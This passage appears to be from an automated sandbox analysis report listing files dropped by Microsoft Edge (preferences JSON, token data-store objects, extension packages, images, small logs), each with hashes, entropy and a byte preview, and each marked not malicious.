                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8482879275258086
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxYxl9Il8ucQadLyvN8BlRHt4Bz3Tod1rc:mVYqQ3voRyFD/
                                                                                                                                                                                                                                                                                  MD5:80FB03D06CC283A869BE76BD2F0B119B
                                                                                                                                                                                                                                                                                  SHA1:AD7429739515A174A34F344FC6E8CC3156A18BAC
                                                                                                                                                                                                                                                                                  SHA-256:7085348E0A457191174CBFCE960ABCB2B31B23B02F55B9DE3313BE58110C33E9
                                                                                                                                                                                                                                                                                  SHA-512:A4683EE2787BE48ECF793C46F45E3E9D446319FC036E0F40321B0D5EAFD94FC8A28639433FBE7C68BDBB69287AF581C61DB924C35F7C3133C18F9D2CB96FECD4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.F.x.z.x.z.d.e.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.X.J.0.d.J.T.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9977459104081667
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:Y2Yqja0lUKyfZQPLLdoblLwIOoJBRsn2XJumrQ:Y25WKycdobZ1OUcnwwqQ
                                                                                                                                                                                                                                                                                  MD5:0BFD7B6719EBCDDDE844B219D90291CB
                                                                                                                                                                                                                                                                                  SHA1:E907F4FB8EB2EC21ABEEB447D4F4F8A53CB2AC90
                                                                                                                                                                                                                                                                                  SHA-256:7F7CE36715F5BFB0EF43898BD4EAB873F95B637A0EE8DFF9F53AFBFCB4A2CA91
                                                                                                                                                                                                                                                                                  SHA-512:C14F116E8BF046CD84A4991CFAE2BD8A627E64AC8B351015D0274136FB411085DA4FD7D07E67DD1B9B27FD7435D4B5A544D969FCF2218AF8E3E80E9E468D7C1B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".r.I.w.V.r.S.9.e.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.X.J.0.d.J.T.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8979683104488076
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xJxl9Il8ucw2hlQhljD63yA19dMYE6CN74+2vEALd/vc:aHYqw2zQhljD419iY/CNk+2vEA2
                                                                                                                                                                                                                                                                                  MD5:BAF53C2DAD15526EAE6469851F42A259
                                                                                                                                                                                                                                                                                  SHA1:8CEBDA763848A101ABAE3BEDE1D25B18EB8E6331
                                                                                                                                                                                                                                                                                  SHA-256:4CAA6048AAC76A4C5F0B6A27B2C05B407367AAF39E1EE3964AC4DB40D6273A57
                                                                                                                                                                                                                                                                                  SHA-512:0CF0505A733C58AF7674ED3398D287D95322BDF7DD6D77FB10EBF17A9EF108DC142DC1A1D987DDFF1B0322614D0DB3E4084AB3537BDF8C090D113B3B4D25EC5E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".v.S.C.e.3.Q.B.9.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.X.J.0.d.J.T.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):31335
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                  MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                  SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                  SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                  SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):48269
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.881053122202074
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:TYz/MGSNW3muF8kc53wBEuHlL3UwZz+qdkYyy4TeTdwsvKjkImcyC2/e359LpzeO:sz/M7tWsLutxdkD1GKjk86G3/hem+I
                                                                                                                                                                                                                                                                                  MD5:180DCC5D38589F3460C78823546ED069
                                                                                                                                                                                                                                                                                  SHA1:7CD66F2F713F3BC9593979D272223E0674830023
                                                                                                                                                                                                                                                                                  SHA-256:68004558C1452B37C6CB93CB7FDD765244A98F9830E983A486147BDCFD6CE1C2
                                                                                                                                                                                                                                                                                  SHA-512:841675CDDEC5D4041A8CC715492C953CBB3C365B3B65CBB8372EB60DBFABE5040E660FBB93002C13F404184AEAF3A6503FE15A325D5CB2703EB89EC125B9C81C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...2......?.....?iCCPICC Profile..H..W.XS...[.....@@J.M......B..6B. ...A..*.v...].Q..bG.,../.T.u.`W............9.3...{....<.$... _\(...d.JMc.......8.K..@......../..D.^q.k.....-.......q......~..*.DZ..Q.[L*..1.@G...x..g)q..g(.n.Mb<..V..<.4...%.3..YP.....X ....../?....t.m...b.>+.....if.j.xY.X9.EQ...H.xS..t..'..a.+5[../.3......rL..G.....6..D..=.(%[....G.....3...........!..H...)..B.W.:YT.M.X........F.x./.!S.a...<....}Yn.[..:[.U.c......).[....!.C.T......Y.........[B./...*...LiH..,.``...l.7Z...f'.)..y...\.KB1;i@GX0*r`..aP.r..3.8)A..AR.....S$y.*{.\..*..!v+(JP....T....De.xq./<V....D....L .5.L.9@......=!... ............k.(..B$.......BP........2..E....... ...{.b.x.[2x...?..`..x.`...{~...!..bd.......`b.1..B...q?......X]p..50....'...C.5B'..xQ...(.@'..Q."..\..P....}.:T..pC...A?l..zv.,G..<+...6......LF.C..d.G....*.\...e..........C............`'.s.a..0.cX........X.....+..:....x..L.8.:w;.Q...'...3A2E*...d...A...N......./...8.w..k.......c.....s......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):591
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.376261568665144
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:YLH7v56s/dHvcu0Dkv/dHNp56s/dwSR56s/d1kMOyWL0Dkv/C:YLH7v5THUu0iHD5TwSR5T1LR+0h
                                                                                                                                                                                                                                                                                  MD5:E315D9A44EFA1C5B4478C41D7B231218
                                                                                                                                                                                                                                                                                  SHA1:C1D75384671AE38B4D35CC1668921125212EF8D0
                                                                                                                                                                                                                                                                                  SHA-256:F4DEC20E3A36F17F3A6C4131A978A5DA393918C8D273844B12D2EDD4ADEF9037
                                                                                                                                                                                                                                                                                  SHA-512:96A82CFD5D334825BF15F712E677E2AD4E6DAFE4669018392550F92F58124796A12499323532A608816EC6468DDC4162615CA0F1FA6DCB250C150D3FE3FE852B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"logTime": "0103/223241", "correlationVector":"4wIPZmbM7Kj4s6LynQiokK","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0103/223241", "correlationVector":"7AEEDD2DE7AA4EACBF5D4C565DD244B4","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0103/223241", "correlationVector":"PHJHNEzt/cDi87j0VcuV8J","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0103/223301", "correlationVector":"QFah79CeUDACRiHYqMUn5G","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0103/223302", "correlationVector":"FAB7D3AF945742639DB4BC054E9C96AF","action":"FETCH_UX_CONFIG", "result":""}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
